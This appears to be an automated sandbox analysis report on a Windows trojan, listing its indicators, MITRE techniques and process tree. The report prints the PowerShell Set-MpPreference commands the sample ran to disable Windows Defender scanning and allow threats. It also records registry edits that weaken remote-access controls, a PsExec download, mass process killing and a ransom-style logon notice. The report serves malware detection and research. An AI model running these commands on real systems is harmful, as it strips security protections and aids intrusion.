936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd

Resubmissions

29-10-2021 14:51

211029-r8nn1aacaj 10

23-03-2021 18:12

210323-s8jdk5y98j 10

Analysis

max time kernel
138s
max time network
120s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Size

296KB
MD5

6b2c7d5298c7fb8f4c4c3531894a91c1
SHA1

d7333af03603b27566ac8ab63d6aa21575e1ebb4
SHA256

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
SHA512

2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

description	flow	ioc
HTTP URL	24	http://live.sysinternals.com/PsExec64.exe

Executes dropped EXE 1 IoCs

pid	Process
6860	dismhost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 5 IoCs

pid	Process
6860	dismhost.exe
6860	dismhost.exe
6860	dismhost.exe
6860	dismhost.exe
6860	dismhost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
6140	Process not Found
10528	icacls.exe
11128	Process not Found
14792	Process not Found
6864	Process not Found
13380	Process not Found
15880	Process not Found
2140	icacls.exe
13560	icacls.exe
5704	Process not Found
9248	Process not Found
13456	Process not Found
17344	Process not Found
13540	Process not Found
14984	Process not Found
18384	Process not Found
14632	Process not Found
16028	Process not Found
14520	Process not Found
14576	Process not Found
16728	Process not Found
15620	icacls.exe
15628	Process not Found
2100	Process not Found
7640	Process not Found
9232	Process not Found
5400	Process not Found
7636	Process not Found
7204	Process not Found
9912	Process not Found
5676	Process not Found
8224	Process not Found
4068	Process not Found
6736	Process not Found
200	Process not Found
17300	Process not Found
15760	Process not Found
13432	Process not Found
10504	Process not Found
7408	Process not Found
8624	Process not Found
12260	Process not Found
18136	Process not Found
16564	Process not Found
4748	Process not Found
16428	Process not Found
11360	Process not Found
9904	Process not Found
2744	Process not Found
8648	Process not Found
2944	Process not Found
13676	Process not Found
4840	Process not Found
5260	Process not Found
6504	Process not Found
15948	Process not Found
5788	Process not Found
6956	Process not Found
7764	Process not Found
5396	icacls.exe
9232	Process not Found
9256	Process not Found
15184	Process not Found
8668	Process not Found

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
14300	net.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
10012	taskkill.exe
9892	taskkill.exe
10212	taskkill.exe
9964	taskkill.exe
10172	taskkill.exe
5532	taskkill.exe
8408	taskkill.exe
9852	taskkill.exe
10020	taskkill.exe
10060	taskkill.exe
9956	taskkill.exe
10156	taskkill.exe
8112	taskkill.exe
10004	taskkill.exe
9996	taskkill.exe
9980	taskkill.exe
9940	taskkill.exe
1100	taskkill.exe
8296	taskkill.exe
9932	taskkill.exe
9868	taskkill.exe
8320	taskkill.exe
10092	taskkill.exe
10084	taskkill.exe
8360	taskkill.exe
8440	taskkill.exe
8080	taskkill.exe
10036	taskkill.exe
9924	taskkill.exe
9900	taskkill.exe
9860	taskkill.exe
7216	taskkill.exe
10180	taskkill.exe
10164	taskkill.exe
10028	taskkill.exe
9844	taskkill.exe
10204	taskkill.exe
9972	taskkill.exe
10108	taskkill.exe
10068	taskkill.exe
9908	taskkill.exe
10228	taskkill.exe
10044	taskkill.exe
10140	taskkill.exe
8216	taskkill.exe
8048	taskkill.exe
10220	taskkill.exe
10188	taskkill.exe
9988	taskkill.exe
9916	taskkill.exe
8456	taskkill.exe
10132	taskkill.exe
10116	taskkill.exe
9948	taskkill.exe
9884	taskkill.exe
9876	taskkill.exe
8248	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1532	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeIncreaseQuotaPrivilege	1060	powershell.exe
Token: SeSecurityPrivilege	1060	powershell.exe
Token: SeTakeOwnershipPrivilege	1060	powershell.exe
Token: SeLoadDriverPrivilege	1060	powershell.exe
Token: SeSystemProfilePrivilege	1060	powershell.exe
Token: SeSystemtimePrivilege	1060	powershell.exe
Token: SeProfSingleProcessPrivilege	1060	powershell.exe
Token: SeIncBasePriorityPrivilege	1060	powershell.exe
Token: SeCreatePagefilePrivilege	1060	powershell.exe
Token: SeBackupPrivilege	1060	powershell.exe
Token: SeRestorePrivilege	1060	powershell.exe
Token: SeShutdownPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeSystemEnvironmentPrivilege	1060	powershell.exe
Token: SeRemoteShutdownPrivilege	1060	powershell.exe
Token: SeUndockPrivilege	1060	powershell.exe
Token: SeManageVolumePrivilege	1060	powershell.exe
Token: 33	1060	powershell.exe
Token: 34	1060	powershell.exe
Token: 35	1060	powershell.exe
Token: 36	1060	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	604	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1100	net1.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	296	powershell.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeDebugPrivilege	8456	taskkill.exe
Token: SeDebugPrivilege	7216	taskkill.exe
Token: SeDebugPrivilege	10068	taskkill.exe
Token: SeDebugPrivilege	10060	taskkill.exe
Token: SeDebugPrivilege	8296	taskkill.exe
Token: SeDebugPrivilege	10164	taskkill.exe
Token: SeDebugPrivilege	9996	taskkill.exe
Token: SeDebugPrivilege	9844	taskkill.exe
Token: SeDebugPrivilege	8320	taskkill.exe
Token: SeDebugPrivilege	10180	taskkill.exe
Token: SeDebugPrivilege	9988	taskkill.exe
Token: SeDebugPrivilege	10228	taskkill.exe
Token: SeDebugPrivilege	8048	taskkill.exe
Token: SeDebugPrivilege	10116	taskkill.exe
Token: SeDebugPrivilege	10044	taskkill.exe
Token: SeDebugPrivilege	8112	taskkill.exe
Token: SeDebugPrivilege	9916	taskkill.exe
Token: SeDebugPrivilege	9940	taskkill.exe
Token: SeDebugPrivilege	9980	taskkill.exe
Token: SeDebugPrivilege	10132	taskkill.exe
Token: SeDebugPrivilege	9860	taskkill.exe
Token: SeDebugPrivilege	10084	taskkill.exe
Token: SeDebugPrivilege	9892	taskkill.exe
Token: SeDebugPrivilege	9932	taskkill.exe
Token: SeDebugPrivilege	9884	taskkill.exe
Token: SeDebugPrivilege	9900	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3736 wrote to memory of 1060	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	69
PID 3736 wrote to memory of 1060	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	69
PID 3736 wrote to memory of 1088	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	72
PID 3736 wrote to memory of 1088	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	72
PID 3736 wrote to memory of 604	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	74
PID 3736 wrote to memory of 604	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	74
PID 3736 wrote to memory of 3572	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	76
PID 3736 wrote to memory of 3572	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	76
PID 3736 wrote to memory of 2040	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	78
PID 3736 wrote to memory of 2040	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	78
PID 3736 wrote to memory of 400	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	80
PID 3736 wrote to memory of 400	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	80
PID 3736 wrote to memory of 1472	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	82
PID 3736 wrote to memory of 1472	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	82
PID 3736 wrote to memory of 4084	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	84
PID 3736 wrote to memory of 4084	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	84
PID 3736 wrote to memory of 1660	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	86
PID 3736 wrote to memory of 1660	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	86
PID 3736 wrote to memory of 836	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	88
PID 3736 wrote to memory of 836	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	88
PID 3736 wrote to memory of 824	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	90
PID 3736 wrote to memory of 824	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	90
PID 3736 wrote to memory of 3292	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	92
PID 3736 wrote to memory of 3292	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	92
PID 3736 wrote to memory of 296	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	94
PID 3736 wrote to memory of 296	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	94
PID 3736 wrote to memory of 1100	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	175
PID 3736 wrote to memory of 1100	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	175
PID 3736 wrote to memory of 2116	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	96
PID 3736 wrote to memory of 2116	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	96
PID 3736 wrote to memory of 1532	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	97
PID 3736 wrote to memory of 1532	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	97
PID 3736 wrote to memory of 1692	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	100
PID 3736 wrote to memory of 1692	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	100
PID 3736 wrote to memory of 2840	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	136
PID 3736 wrote to memory of 2840	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	136
PID 3736 wrote to memory of 364	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	104
PID 3736 wrote to memory of 364	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	104
PID 3736 wrote to memory of 2420	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	105
PID 3736 wrote to memory of 2420	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	105
PID 3736 wrote to memory of 4136	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	108
PID 3736 wrote to memory of 4136	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	108
PID 3736 wrote to memory of 4200	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	109
PID 3736 wrote to memory of 4200	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	109
PID 3736 wrote to memory of 4552	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	210
PID 3736 wrote to memory of 4552	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	210
PID 3736 wrote to memory of 4600	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	129
PID 3736 wrote to memory of 4600	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	129
PID 3736 wrote to memory of 4644	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	599
PID 3736 wrote to memory of 4644	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	599
PID 3736 wrote to memory of 4688	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	116
PID 3736 wrote to memory of 4688	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	116
PID 3736 wrote to memory of 4776	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	128
PID 3736 wrote to memory of 4776	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	128
PID 3736 wrote to memory of 4832	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	121
PID 3736 wrote to memory of 4832	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	121
PID 3736 wrote to memory of 4908	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	122
PID 3736 wrote to memory of 4908	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	122
PID 3736 wrote to memory of 4952	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	209
PID 3736 wrote to memory of 4952	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	209
PID 3736 wrote to memory of 5012	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	124
PID 3736 wrote to memory of 5012	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	124
PID 3736 wrote to memory of 5052	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	130
PID 3736 wrote to memory of 5052	3736	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	130

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
1⤵
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:824
